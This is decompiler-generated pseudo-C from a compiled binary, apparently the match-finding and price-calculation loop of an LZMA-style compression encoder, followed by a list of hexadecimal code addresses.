				intOrPtr _t1129;
				signed int _t1131;
				signed int _t1136;
				void* _t1137;
				intOrPtr* _t1140;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				signed int _t1148;
				void* _t1151;
				void* _t1153;

				while(1) {
					L58:
					_t854 =  *((intOrPtr*)(_t1153 + 0x20));
					_t686 = _t854 -  *((intOrPtr*)(_t1153 + 0x5c +  *(_t1153 + 0x80) * 4)) - 1;
					 *(_t1153 + 0x28) = _t686;
					if( *_t854 !=  *_t686) {
						goto L86;
					}
					L59:
					_t1023 =  *((intOrPtr*)(_t1153 + 0x20));
					_t910 =  *(_t1153 + 0x28);
					if( *((intOrPtr*)(_t1023 + 1)) !=  *((intOrPtr*)(_t910 + 1))) {
						goto L86;
					}
					_t1141 =  *(_t1153 + 0x24);
					_t1087 = 2;
					if(_t1141 <= 2) {
						L64:
						_t1024 =  *(_t1153 + 0x18);
						_t801 = _t1087 +  *(_t1153 + 0x14);
						if(_t1024 >= _t801) {
							L67:
							_t1142 = _t1087;
							_t733 = E00460150( *(_t1153 + 0x80), _t1151,  *((intOrPtr*)(_t1153 + 0x20)),  *(_t1153 + 0x30)) +  *((intOrPtr*)(_t1153 + 0x48));
							_t913 =  *(_t1153 + 0x30) * 0x110;
							 *(_t1153 + 0x4c) = _t913;
							_t1027 = _t1151 + 0x37858 + (_t913 + _t1087) * 4;
							 *(_t1153 + 0x50) = _t733;
							 *(_t1153 + 0x2c) = _t1027;
							_t917 = _t1151 + 0x6bc + (_t801 + _t801 * 2 + _t801 + _t801 * 2) * 8;
							_t802 = _t1027;
							do {
								_t1029 =  *_t802 + _t733;
								if(_t1029 <  *((intOrPtr*)(_t917 - 0x1c))) {
									 *((intOrPtr*)(_t917 - 0x1c)) = _t1029;
									 *(_t917 - 4) =  *(_t1153 + 0x14);
									 *_t917 =  *(_t1153 + 0x80);
									 *(_t917 - 0x14) = 0;
								}
								_t1087 = _t1087 - 1;
								_t802 = _t802 - 4;
								_t917 = _t917 - 0x30;
							} while (_t1087 >= 2);
							if( *(_t1153 + 0x80) == 0) {
								_t315 = 1 + _t1142; // 0x4
								 *(_t1153 + 0x40) = _t315;
							}
							_t1030 =  *(_t1153 + 0x34);
							_t319 = 1 + _t1142; // 0x4
							_t734 = _t319;
							_t919 =  *(_t1151 + 0x31934) + _t734;
							 *(_t1153 + 0x2c) = _t919;
							if(_t919 > _t1030) {
								_t919 = _t1030;
								 *(_t1153 + 0x2c) = _t1030;
							}
							_t920 =  *((intOrPtr*)(_t1153 + 0x20));
							if(_t734 >= _t919) {
								L79:
								_t735 = _t734 + (_t1030 | 0xffffffff) - _t1142;
								 *((intOrPtr*)(_t1153 + 0x3c)) = _t735;
								if(_t735 < 2) {
									goto L86;
								}
								_t737 =  *(_t1153 + 0x84) + _t1142;
								 *(_t1153 + 0x2c) = _t737;
								 *(_t1153 + 0x44) = _t737 &  *(_t1151 + 0x325a4);
								_t740 = L0045FBE0( *( *(_t1153 + 0x28) + _t1142) & 0x000000ff,  *(_t1142 + _t920) & 0x000000ff, _t1151 + 0x30ea0, ((( *(_t1142 + _t920 - 1) & 0x000000ff) >> 8 -  *(_t1151 + 0x32598)) + ( *(_t1153 + 0x44) <<  *(_t1151 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t1151 + 0x325ac)));
								_t1037 =  *(0x47c63c +  *(_t1153 + 0x1c) * 4);
								_t804 =  *(_t1151 + 0x325a8);
								_t1096 =  *(0x47c5dc + _t1037 * 4);
								_t360 = 1 +  *(_t1153 + 0x84); // 0x4
								_t935 = _t1142 + _t360 & _t804;
								_t1041 = (_t1096 << 4) + _t935;
								 *(_t1153 + 0x44) = _t1041;
								 *(_t1153 + 0x50) = ( *(_t1151 + 0x325b0 + _t1041 * 2) & 0x0000ffff ^ 0x000007f0) >> 4;
								_t1047 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t1096 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 +  *(_t1153 + 0x50) * 4)) + _t740 +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + (( *(_t1153 + 0x2c) & _t804) + (_t1037 << 4)) * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + ( *(_t1153 + 0x4c) + _t1142) * 4)) +  *(_t1153 + 0x50);
								_t810 =  *((intOrPtr*)(_t1153 + 0x3c)) + _t1142 + 1 +  *(_t1153 + 0x14);
								_t746 =  *(_t1153 + 0x18);
								 *(_t1153 + 0x4c) = _t810;
								if(_t746 >= _t810) {
									L84:
									_t939 = _t810 + _t810 * 2 + _t810 + _t810 * 2;
									_t754 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 +  *(_t1153 + 0x44) * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t1096 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + (_t935 * 0x110 +  *((intOrPtr*)(_t1153 + 0x3c))) * 4)) + _t1047;
									_t940 = _t1151 + 0x6a0 + _t939 * 8;
									if(_t754 <  *((intOrPtr*)(_t1151 + 0x6a0 + _t939 * 8))) {
										 *_t940 = _t754;
										_t420 = 1 +  *(_t1153 + 0x14); // 0x4
										 *((intOrPtr*)(_t940 + 0x18)) = _t1142 + _t420;
										 *(_t940 + 0x10) =  *(_t1153 + 0x14);
										 *(_t940 + 0x1c) = 0;
										 *(_t940 + 8) = 1;
										 *(_t940 + 0xc) = 1;
										 *(_t940 + 0x14) =  *(_t1153 + 0x80);
									}
									goto L86;
								}
								 *(_t1153 + 0x50) = _t1151 + 0x6a0 + (_t746 + _t746 * 2 + _t746 + _t746 * 2) * 8;
								_t760 =  *(_t1153 + 0x18);
								_t811 = _t810 - _t760;
								 *(_t1153 + 0x18) = _t760 + _t811;
								_t762 =  *(_t1153 + 0x50);
								do {
									_t762 = _t762 + 0x30;
									_t811 = _t811 - 1;
									 *_t762 = 0x40000000;
								} while (_t811 != 0);
								_t810 =  *(_t1153 + 0x4c);
								goto L84;
							} else {
								_t1099 = _t734 + _t920;
								_t1030 =  *(_t1153 + 0x28) - _t920;
								while( *_t1099 ==  *((intOrPtr*)(_t1099 + _t1030))) {
									_t734 = _t734 + 1;
									_t1099 = _t1099 + 1;
									if(_t734 <  *(_t1153 + 0x2c)) {
										continue;
									}
									goto L79;
								}
								goto L79;
							}
						}
						_t765 = _t801 - _t1024;
						_t943 = _t1151 + 0x6a0 + (_t1024 + _t1024 * 2 + _t1024 + _t1024 * 2) * 8;
						 *(_t1153 + 0x18) = _t1024 + _t765;
						do {
							_t943 = _t943 + 0x30;
							_t765 = _t765 - 1;
							 *_t943 = 0x40000000;
						} while (_t765 != 0);
						goto L67;
					}
					_t766 = _t1023 + 2;
					_t944 = _t910 - _t1023;
					while( *_t766 ==  *((intOrPtr*)(_t944 + _t766))) {
						_t1087 = 1 + _t1087;
						_t766 = _t766 + 1;
						if(_t1087 < _t1141) {
							continue;
						}
						goto L64;
					}
					goto L64;
					L86:
					_t688 = 1 +  *(_t1153 + 0x80);
					 *(_t1153 + 0x80) = _t688;
					if(_t688 < 4) {
						do {
							L58:
							_t854 =  *((intOrPtr*)(_t1153 + 0x20));
							_t686 = _t854 -  *((intOrPtr*)(_t1153 + 0x5c +  *(_t1153 + 0x80) * 4)) - 1;
							 *(_t1153 + 0x28) = _t686;
							if( *_t854 !=  *_t686) {
								goto L86;
							}
							goto L59;
						} while (_t688 < 4);
					}
					_t1122 =  *(_t1153 + 0x54);
					_t689 =  *(_t1153 + 0x24);
					if(_t1122 <= _t689) {
						L91:
						_t988 =  *(_t1153 + 0x40);
						if(_t1122 < _t988) {
							while(1) {
								L127:
								_t683 = 1 +  *(_t1153 + 0x14);
								 *(_t1153 + 0x14) = _t683;
								if(_t683 ==  *(_t1153 + 0x18)) {
									break;
								}
								_t647 = E004600C0(_t1151, _t1153 + 0x38);
								 *(_t1153 + 0x54) = _t647;
								if(_t647 >=  *(_t1151 + 0x31934)) {
									 *((intOrPtr*)(_t1151 + 0x698)) =  *((intOrPtr*)(_t1153 + 0x38));
									 *(_t1151 + 0x694) = _t647;
									L130:
									return E00460210( *(_t1153 + 0x14), _t1151,  *((intOrPtr*)(_t1153 + 0x88)));
								} else {
									_t1118 =  *(_t1153 + 0x14);
									 *(_t1153 + 0x84) = 1 +  *(_t1153 + 0x84);
									_t791 = _t1118 + _t1118 * 2 << 4;
									_t1071 =  *((intOrPtr*)(_t791 + _t1151 + 0x6a8));
									_t650 =  *(_t791 + _t1151 + 0x6b8);
									_t792 = _t791 + _t1151;
									if(_t1071 == 0) {
										_t970 =  *(_t1151 + 0x6a4 + (_t650 + _t650 * 2 + _t650 + _t650 * 2) * 8);
									} else {
										_t650 = _t650 - 1;
										if( *((intOrPtr*)(_t792 + 0x6ac)) == 0) {
											_t970 =  *(0x47c5dc +  *(_t1151 + 0x6a4 + (_t650 + _t650 * 2 + _t650 + _t650 * 2) * 8) * 4);
										} else {
											_t966 =  *(_t1151 + 0x6a4 + ( *(_t792 + 0x6b0) +  *(_t792 + 0x6b0) * 2 +  *(_t792 + 0x6b0) +  *(_t792 + 0x6b0) * 2) * 8);
											if( *(_t792 + 0x6b4) >= 4) {
												_t970 =  *(0x47c5dc +  *(0x47c60c + _t966 * 4) * 4);
											} else {
												_t970 =  *(0x47c5dc +  *(0x47c63c + _t966 * 4) * 4);
											}
										}
									}
									if(_t650 != _t1118 - 1) {
										if(_t1071 == 0 ||  *((intOrPtr*)(_t792 + 0x6ac)) == 0) {
											_t828 =  *(_t792 + 0x6bc);
											 *(_t1153 + 0x80) = _t828;
											if(_t828 >= 4) {
												_t971 =  *(0x47c60c + _t970 * 4);
												_t829 =  *(_t1153 + 0x80);
												goto L19;
											}
											 *(_t1153 + 0x1c) =  *(0x47c63c + _t970 * 4);
											_t829 =  *(_t1153 + 0x80);
											goto L20;
										} else {
											_t829 =  *(_t792 + 0x6b4);
											_t650 =  *(_t792 + 0x6b0);
											_t971 =  *(0x47c63c + _t970 * 4);
											 *(_t1153 + 0x80) = _t829;
											L19:
											 *(_t1153 + 0x1c) = _t971;
											L20:
											_t972 = _t1151 + 0x6a0 + (_t650 + _t650 * 2 + _t650 + _t650 * 2) * 8;
											if(_t829 >= 4) {
												 *((intOrPtr*)(_t1153 + 0x5c)) = _t829 + 0xfffffffc;
												 *(_t1153 + 0x60) =  *(_t972 + 0x20);
												 *((intOrPtr*)(_t1153 + 0x64)) =  *((intOrPtr*)(_t972 + 0x24));
												 *((intOrPtr*)(_t1153 + 0x68)) =  *((intOrPtr*)(_t972 + 0x28));
												goto L25;
											}
											 *((intOrPtr*)(_t1153 + 0x5c)) =  *((intOrPtr*)(_t972 + 0x20 + _t829 * 4));
											_t784 = 1;
											if(_t829 < 1) {
												L23:
												memcpy(_t1153 + 0x5c + _t784 * 4, _t972 + 0x20 + _t784 * 4, 4 << 2);
												_t1153 = _t1153 + 0xc;
												goto L25;
											}
											_t784 = memcpy(_t1153 + 0x60, _t972 + 0x20, _t829 << 2);
											_t1153 = _t1153 + 0xc;
											if(1 >= 4) {
												goto L25;
											}
											goto L23;
										}
									} else {
										if( *(_t792 + 0x6bc) != 0) {
											 *(_t1153 + 0x1c) =  *(0x47c5dc + _t970 * 4);
										} else {
											 *(_t1153 + 0x1c) =  *(0x47c66c + _t970 * 4);
										}
										L25:
										_t1120 =  *(_t1153 + 0x1c);
										 *((intOrPtr*)(_t792 + 0x6c0)) =  *((intOrPtr*)(_t1153 + 0x5c));
										 *(_t792 + 0x6c4) =  *(_t1153 + 0x60);
										 *(_t792 + 0x6a4) = _t1120;
										 *((intOrPtr*)(_t792 + 0x6c8)) =  *((intOrPtr*)(_t1153 + 0x64));
										 *((intOrPtr*)(_t792 + 0x6cc)) =  *((intOrPtr*)(_t1153 + 0x68));
										 *(_t1153 + 0x24) =  *(_t792 + 0x6a0);
										 *(_t1153 + 0x28) = 0;
										_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t1151 + 0xc))))() - 1; // -1
										_t1072 = _t106;
										 *(_t1153 + 0x80) =  *_t1072;
										_t659 = _t1072 -  *((intOrPtr*)(_t1153 + 0x5c));
										 *((intOrPtr*)(_t1153 + 0x3c)) = _t659 - 1;
										 *(_t1153 + 0x13) =  *((intOrPtr*)(_t659 - 1));
										_t977 =  *(_t1153 + 0x84);
										_t662 = _t977 &  *(_t1151 + 0x325a8);
										 *(_t1153 + 0x30) = _t662;
										_t663 = _t662 + (_t1120 << 4);
										 *(_t1153 + 0x40) = _t663;
										 *((intOrPtr*)(_t1153 + 0x20)) = _t1072;
										 *(_t1153 + 0x2c) =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t663 * 2) & 0x0000ffff) >> 4) * 4)) +  *(_t1153 + 0x24);
										 *(_t1153 + 0x44) =  *(_t1151 + 0x325a4) & _t977;
										_t1077 = ((( *(_t1072 - 1) & 0x000000ff) >> 8 -  *(_t1151 + 0x32598)) + ( *(_t1153 + 0x44) <<  *(_t1151 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t1151 + 0x325ac));
										if(_t1120 < 7) {
											 *(_t1153 + 0x34) = 0;
											_t672 =  *(_t1153 + 0x80) & 0x000000ff | 0x00000100;
											do {
												_t851 =  *(_t1153 + 0x34) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1077 + (_t672 >> 8) * 2) & 0x0000ffff) >> 0x00000004 ^  ~(_t672 >> 0x00000007 & 0x00000001) >> 0x00000004 & 0x0000007f) * 4));
												_t672 = _t672 + _t672;
												 *(_t1153 + 0x34) = _t851;
											} while (_t672 < 0x10000);
											_t673 = _t851;
											L30:
											_t982 =  *(_t1153 + 0x2c) + _t673;
											 *(_t1153 + 0x2c) = _t982;
											if(_t982 <  *(_t792 + 0x6d0)) {
												 *(_t792 + 0x6d0) = _t982;
												 *(_t792 + 0x6e8) =  *(_t1153 + 0x14);
												 *((intOrPtr*)(_t792 + 0x6ec)) = 0xffffffff;
												 *(_t792 + 0x6d8) = 0;
												 *(_t1153 + 0x28) = 1;
											}
											_t852 =  *(_t1153 + 0x40);
											_t678 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t852 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *(_t1153 + 0x24);
											_t986 =  *(_t1153 + 0x14);
											_t1079 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t1120 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) + _t678;
											 *((intOrPtr*)(_t1153 + 0x58)) = _t678;
											 *((intOrPtr*)(_t1153 + 0x48)) = _t1079;
											if( *(_t1153 + 0x13) ==  *(_t1153 + 0x80) && ( *(_t792 + 0x6e8) >= _t986 ||  *((intOrPtr*)(_t792 + 0x6ec)) != 0)) {
												_t780 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t1120 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 + _t852 * 2) & 0x0000ffff) >> 4) * 4)) + _t1079;
												if(_t780 <=  *(_t792 + 0x6d0)) {
													 *(_t792 + 0x6d0) = _t780;
													 *(_t792 + 0x6e8) = _t986;
													 *((intOrPtr*)(_t792 + 0x6ec)) = 0;
													 *(_t792 + 0x6d8) = 0;
													 *(_t1153 + 0x28) = 1;
												}
											}
											_t853 =  *(_t1151 + 0x69c);
											_t681 = 0xfff - _t986;
											 *(_t1153 + 0x34) = _t853;
											if(0xfff < _t853) {
												_t853 = 0xfff;
												 *(_t1153 + 0x34) = _t681;
											}
											if(_t853 < 2) {
												continue;
											} else {
												_t1121 =  *(_t1151 + 0x31934);
												 *(_t1153 + 0x24) = _t853;
												if(_t853 > _t1121) {
													 *(_t1153 + 0x24) = _t1121;
												}
												if( *(_t1153 + 0x28) != 0 ||  *(_t1153 + 0x13) ==  *(_t1153 + 0x80)) {
													L57:
													 *(_t1153 + 0x40) = 2;
													 *(_t1153 + 0x80) = 0;
													goto L58;
												} else {
													_t1143 = 1 + _t1121;
													if(_t1143 > _t853) {
														_t1143 = _t853;
													}
													_t945 = 1;
													if(_t1143 <= 1) {
														L50:
														_t204 = _t945 - 1; // 0x1
														_t767 = _t204;
														 *(_t1153 + 0x80) = _t767;
														if(_t767 < 2) {
															goto L57;
														}
														_t769 =  *(0x47c5dc +  *(_t1153 + 0x1c) * 4);
														_t948 = 0x00000001 +  *(_t1153 + 0x84) &  *(_t1151 + 0x325a8);
														_t815 = (_t769 << 4) + _t948;
														_t1061 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t815 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t769 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *(_t1153 + 0x2c);
														_t1148 =  *(_t1153 + 0x80) + 1 +  *(_t1153 + 0x14);
														_t1101 =  *(_t1153 + 0x18);
														 *(_t1153 + 0x40) = _t815;
														if(_t1101 >= _t1148) {
															L55:
															_t952 = _t1148 + _t1148 * 2 + _t1148 + _t1148 * 2;
															_t773 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 + _t815 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t769 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + (_t948 * 0x110 +  *(_t1153 + 0x80)) * 4)) + _t1061;
															_t953 = _t1151 + 0x6a0 + _t952 * 8;
															if(_t773 <  *((intOrPtr*)(_t1151 + 0x6a0 + _t952 * 8))) {
																 *_t953 = _t773;
																 *((intOrPtr*)(_t953 + 0x18)) = 1 +  *(_t1153 + 0x14);
																 *((intOrPtr*)(_t953 + 0x1c)) = 0;
																 *(_t953 + 8) = 1;
																 *((intOrPtr*)(_t953 + 0xc)) = 0;
															}
															goto L57;
														}
														 *(_t1153 + 0x44) = _t1151 + 0x6a0 + (_t1101 + _t1101 * 2 + _t1101 + _t1101 * 2) * 8;
														_t822 = _t1148 - _t1101;
														 *(_t1153 + 0x18) = _t1101 + _t822;
														_t1106 =  *(_t1153 + 0x44);
														do {
															_t1106 = _t1106 + 0x30;
															_t822 = _t822 - 1;
															 *_t1106 = 0x40000000;
														} while (_t822 != 0);
														_t815 =  *(_t1153 + 0x40);
														goto L55;
													} else {
														_t1064 =  *((intOrPtr*)(_t1153 + 0x20));
														_t775 = _t1064 + 1;
														_t1108 =  *((intOrPtr*)(_t1153 + 0x3c)) - _t1064;
														while( *_t775 ==  *((intOrPtr*)(_t1108 + _t775))) {
															_t945 = _t945 + 1;
															_t775 = _t775 + 1;
															if(_t945 < _t1143) {
																continue;
															}
															goto L50;
														}
														goto L50;
													}
												}
											}
										}
										_t673 = L0045FBE0( *(_t1153 + 0x13) & 0x000000ff,  *(_t1153 + 0x80) & 0x000000ff, _t1151 + 0x30ea0, _t1077);
										goto L30;
									}
								}
							}
							goto L130;
						}
						 *((intOrPtr*)(_t1153 + 0x58)) =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 +  *(_t1153 + 0x1c) * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1153 + 0x58));
						_t694 = _t1122 +  *(_t1153 + 0x14);
						_t858 =  *(_t1153 + 0x18);
						if(_t858 >= _t694) {
							L95:
							_t695 = 0;
							 *(_t1153 + 0x80) = 0;
							if(_t988 <=  *((intOrPtr*)(_t1151 + 0x310a0))) {
								L99:
								_t697 =  *(_t1151 + 0x310a4 +  *(_t1153 + 0x80) * 4);
								_t1080 = 1 + _t988;
								 *(_t1153 + 0x2c) = _t697;
								 *(_t1153 + 0x28) = ( *((_t697 >> ( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) + _t1151 + 0x306a0) & 0x000000ff) + (( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) * 2;
								 *(_t1153 + 0x30) = _t1151 + 0x33010 + ( *(_t1153 + 0x30) * 0x110 + _t988) * 4;
								_t793 = _t1151 + 0x6bc + ( *(_t1153 + 0x14) + _t988 + ( *(_t1153 + 0x14) + _t988) * 2 +  *(_t1153 + 0x14) + _t988 + ( *(_t1153 + 0x14) + _t988) * 2) * 8;
								while(1) {
									_t992 =  *( *(_t1153 + 0x30)) +  *((intOrPtr*)(_t1153 + 0x58));
									 *(_t1153 + 0x24) = _t793;
									 *(_t1153 + 0x44) = _t1080;
									_t874 = _t1080 - 3;
									if(_t1080 - 1 >= 5) {
										_t874 = 3;
									}
									if(_t697 >= 0x80) {
										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31950 + ( *(_t1153 + 0x28) + (_t874 << 6)) * 4)) +  *((intOrPtr*)(_t1151 + 0x32550 + (_t697 & 0x0000000f) * 4));
									} else {
										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31d50 + ((_t874 << 7) + _t697) * 4));
									}
									 *(_t1153 + 0x40) = _t993;
									if(_t993 <  *(_t793 - 0x1c)) {
										 *(_t793 - 0x1c) = _t993;
										 *(_t793 - 4) =  *(_t1153 + 0x14);
										 *_t793 = _t697 + 4;
										 *(_t793 - 0x14) = 0;
									}
									if(_t1080 - 1 !=  *((intOrPtr*)(_t1151 + 0x310a0 +  *(_t1153 + 0x80) * 4))) {
										goto L126;
									}
									L108:
									_t995 =  *(_t1153 + 0x34);
									_t699 =  *(_t1151 + 0x31934) + _t1080;
									_t882 =  *((intOrPtr*)(_t1153 + 0x20)) - _t697 - 1;
									_t1128 = _t1080;
									if(_t699 > _t995) {
										_t699 = _t995;
									}
									if(_t1080 >= _t699) {
										L116:
										_t1129 = _t1128 + (_t995 | 0xffffffff) - _t1080 - 1;
										 *((intOrPtr*)(_t1153 + 0x3c)) = _t1129;
										if(_t1129 < 2) {
											L123:
											_t702 =  *(_t1153 + 0x80) + 2;
											 *(_t1153 + 0x80) = _t702;
											if(_t702 ==  *((intOrPtr*)(_t1153 + 0x38))) {
												goto L127;
											}
											_t697 =  *(_t1151 + 0x310a4 + _t702 * 4);
											 *(_t1153 + 0x2c) = _t697;
											if(_t697 >= 0x80) {
												 *(_t1153 + 0x28) = ( *((_t697 >> ( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) + _t1151 + 0x306a0) & 0x000000ff) + (( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) * 2;
											}
											goto L126;
										}
										_t704 =  *(_t1153 + 0x84) + _t1080 - 1;
										 *(_t1153 + 0x54) = _t704;
										_t1131 =  *(_t1151 + 0x325a8) & _t704;
										_t706 = L0045FBE0( *(_t882 + _t1080 - 1) & 0x000000ff,  *(_t1080 +  *((intOrPtr*)(_t1153 + 0x20)) - 1) & 0x000000ff, _t1151 + 0x30ea0, ((( *( *((intOrPtr*)(_t1153 + 0x20)) + _t1080 - 2) & 0x000000ff) >> 8 -  *(_t1151 + 0x32598)) + (( *(_t1151 + 0x325a4) &  *(_t1153 + 0x54)) <<  *(_t1151 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t1151 + 0x325ac)));
										_t896 =  *(0x47c60c +  *(_t1153 + 0x1c) * 4);
										_t795 =  *(0x47c5dc + _t896 * 4);
										_t1080 =  *(_t1153 + 0x44);
										_t898 = 0x00000001 + _t1131 &  *(_t1151 + 0x325a8);
										_t1012 = (_t795 << 4) + _t898;
										 *(_t1153 + 0x4c) = _t1012;
										_t1018 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t1012 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t795 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) + _t706 +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + ((_t896 << 4) + _t1131) * 2) & 0x0000ffff) >> 4) * 4)) +  *(_t1153 + 0x40);
										_t1136 =  *((intOrPtr*)(_t1153 + 0x3c)) + _t1080 - 1 + 1 +  *(_t1153 + 0x14);
										_t711 =  *(_t1153 + 0x18);
										 *(_t1153 + 0x50) = _t1136;
										if(_t711 >= _t1136) {
											L121:
											_t793 =  *(_t1153 + 0x24);
											_t902 = _t1136 + _t1136 * 2 + _t1136 + _t1136 * 2;
											_t719 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 +  *(_t1153 + 0x4c) * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t795 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + (_t898 * 0x110 +  *((intOrPtr*)(_t1153 + 0x3c))) * 4)) + _t1018;
											_t903 = _t1151 + 0x6a0 + _t902 * 8;
											if(_t719 <  *((intOrPtr*)(_t1151 + 0x6a0 + _t902 * 8))) {
												_t1019 =  *(_t1153 + 0x14);
												 *_t903 = _t719;
												 *(_t903 + 0x10) = _t1019;
												 *((intOrPtr*)(_t903 + 0x18)) = _t1080 + _t1019;
												 *(_t903 + 0x1c) = 0;
												 *(_t903 + 8) = 1;
												 *(_t903 + 0xc) = 1;
												 *((intOrPtr*)(_t903 + 0x14)) =  *(_t1153 + 0x2c) + 4;
											}
											goto L123;
										}
										 *(_t1153 + 0x54) = _t1151 + 0x6a0 + (_t711 + _t711 * 2 + _t711 + _t711 * 2) * 8;
										_t725 =  *(_t1153 + 0x18);
										_t1137 = _t1136 - _t725;
										 *(_t1153 + 0x18) = _t725 + _t1137;
										_t727 =  *(_t1153 + 0x54);
										do {
											_t727 = _t727 + 0x30;
											_t1137 = _t1137 - 1;
											 *_t727 = 0x40000000;
										} while (_t1137 != 0);
										_t1136 =  *(_t1153 + 0x50);
										goto L121;
									} else {
										_t799 =  *((intOrPtr*)(_t1153 + 0x20)) - _t882;
										_t995 = _t882 + _t1080;
										 *(_t1153 + 0x54) = _t799;
										while( *((intOrPtr*)(_t799 + _t995)) ==  *_t995) {
											_t1128 = 1 + _t1128;
											_t995 = 1 + _t995;
											if(_t1128 < _t699) {
												_t799 =  *(_t1153 + 0x54);
												continue;
											}
											break;
										}
										_t793 =  *(_t1153 + 0x24);
										goto L116;
									}
									L126:
									 *(_t1153 + 0x30) =  *(_t1153 + 0x30) + 4;
									_t793 = _t793 + 0x30;
									_t1080 = 1 + _t1080;
									_t992 =  *( *(_t1153 + 0x30)) +  *((intOrPtr*)(_t1153 + 0x58));
									 *(_t1153 + 0x24) = _t793;
									 *(_t1153 + 0x44) = _t1080;
									_t874 = _t1080 - 3;
									if(_t1080 - 1 >= 5) {
										_t874 = 3;
									}
									if(_t697 >= 0x80) {
										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31950 + ( *(_t1153 + 0x28) + (_t874 << 6)) * 4)) +  *((intOrPtr*)(_t1151 + 0x32550 + (_t697 & 0x0000000f) * 4));
									} else {
										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31d50 + ((_t874 << 7) + _t697) * 4));
									}
									 *(_t1153 + 0x40) = _t993;
									if(_t993 <  *(_t793 - 0x1c)) {
										 *(_t793 - 0x1c) = _t993;
										 *(_t793 - 4) =  *(_t1153 + 0x14);
										 *_t793 = _t697 + 4;
										 *(_t793 - 0x14) = 0;
									}
									if(_t1080 - 1 !=  *((intOrPtr*)(_t1151 + 0x310a0 +  *(_t1153 + 0x80) * 4))) {
										goto L126;
									}
								}
							}
							do {
								_t695 = _t695 + 2;
							} while (_t988 >  *((intOrPtr*)(_t1151 + 0x310a0 + _t695 * 4)));
							 *(_t1153 + 0x80) = _t695;
							goto L99;
						}
						_t728 = _t694 - _t858;
						_t1140 = _t1151 + 0x6a0 + (_t858 + _t858 * 2 + _t858 + _t858 * 2) * 8;
						 *(_t1153 + 0x18) = _t858 + _t728;
						do {
							_t1140 = _t1140 + 0x30;
							_t728 = _t728 - 1;
							 *_t1140 = 0x40000000;
						} while (_t728 != 0);
						goto L95;
					}
					_t908 = 0;
					_t1122 = _t689;
					if(_t689 <=  *((intOrPtr*)(_t1151 + 0x310a0))) {
						L90:
						 *(_t1151 + 0x310a0 + _t908 * 4) = _t689;
						 *((intOrPtr*)(_t1153 + 0x38)) = _t908 + 2;
						goto L91;
					} else {
						goto L89;
					}
					do {
						L89:
						_t908 = _t908 + 2;
					} while (_t689 >  *(_t1151 + 0x310a0 + _t908 * 4));
					goto L90;
				}
			}








































































































































                                                                                  0x00460e00
                                                                                  0x00460e00
                                                                                  0x00460e00
                                                                                  0x00460e13
                                                                                  0x00460e14
                                                                                  0x00460e1a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00460e20
                                                                                  0x00460e20
                                                                                  0x00460e27
                                                                                  0x00460e2e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00460e34
                                                                                  0x00460e38
                                                                                  0x00460e3f
                                                                                  0x00460e53
                                                                                  0x00460e57
                                                                                  0x00460e5b
                                                                                  0x00460e60
                                                                                  0x00460e8c
                                                                                  0x00460e9e
